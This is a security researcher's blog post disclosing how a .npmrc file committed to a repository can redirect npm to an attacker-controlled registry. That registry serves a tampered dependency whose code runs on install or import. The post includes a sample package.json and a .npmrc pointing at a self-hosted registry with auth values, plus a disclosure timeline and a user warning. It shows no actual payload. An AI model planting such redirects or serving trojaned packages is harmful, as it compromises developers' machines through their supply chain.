Post cover image
abbrev package source code on github

June 5, 2026

Using .npmrc to achieve remote code execution on npm users

What a miserable day to be wring about anything, But here we go again since this day has been really amazing and I couldn’t miss writing a…

Mohammed Dief

2 min read

What a miserable day to be wring about anything, But here we go again since this day has been really amazing and I couldn't miss writing a blog about this

And yeah the title that you just read is what it says, A .npmrc file can actually execute system commands in your system and you wouldn't even notice it and here's how it's being done

Swapping the npm registry to turn harmless code into malwares:

If any of you dealt with npm before, you would know that the .npmrc file is actually responsible for the registry authentication and the npm client can look into any custom registry for npm, the main npm registry out there isn't the only option you had and many companies do actually have their own private registry that they publish their code into

Using this concept, that's where our exploit actually works, .npmrc is supposed to be a configuration for your system, But that's where npm security actually fails, cause it could be overwritten easily based on the directory that you're actually in, Meaning that if the directory your inside contains a .npmrc file, npm is loading that custom file instead of going back into the system-wide npm configuration on your machine, which allows us to overwrite those configurations

Now into the actual exploit, What do we actually need to craft something like that? Let me explain the entire setup to you

  1. A custom self-hosted npm registry
  2. A modified package with the same name as any of the packages inside of "dependencies" in package.json

Building it:

For the custom registry we would actually just need to setup verdaccio which you easily do using their docker image and following their setup guide, for more information see https://hub.docker.com/r/verdaccio/verdaccio

Then building any dummy package that we can publish online on Github or any code hosting platform, Something similar to this

{
  "name": "dummy-dummy",
  "version": "0.0.0",
  "dependencies": {
    "abbrev": "^1.0.0"
  }
}

Now we need to actually publish a package called abbrev inside of our custom npm registry, But with our code, in this case all we need to do is to clone abbrev and add the code where our execution happens in the functionality we're using, and for abbrev they only got index.js inside of the package, so we can easily get our execution happening the moment abbrev is imported in our application

None

Then to our last piece, We can just abuse the fact that npm actually allows us to overwrite the .npmrc and publish our own .npmrc with the project

# .npmrc
registry=http://127.0.0.1:31337/
//127.0.0.1:31337/:_authToken=PROJECT_TOKEN_PLACED
//127.0.0.1:31337/:_auth=YXR0YWNrZXI6YXR0YWNrZXI=

We just need to adjust the IP and authorization tokens on the configuration, and npm now points out at our own server, and we can serve the user modifed module where we can actually execute code both ways

  1. Install scripts on the package
  2. Execution from the package itself if the user used the --ignore-scripts flag upon using npm install on your project

TL;DR

Don't use npm install on any github repository, only use it at your own projects that you wrote, Microsoft doesn't care enough to protect you and the ignore-scripts flag isn't enough to protect you, and doesn't protect you, any reposotiry on Github can actually overwrite your configuration and force you to download modifed packages that contains malwares, If you can use anything else but npm that's a much safer option for you

Timeline:

  • May 16, 2026Report submitted to Microsoft through their Github bug bounty program on hackerone
  • June 5, 2026 — Github responded that this is intentional design decision and is working as expected
  • June 5, 2026 — I notifed them that I'm disclosing this to public through my blog to make people aware of such a thing

Stay safe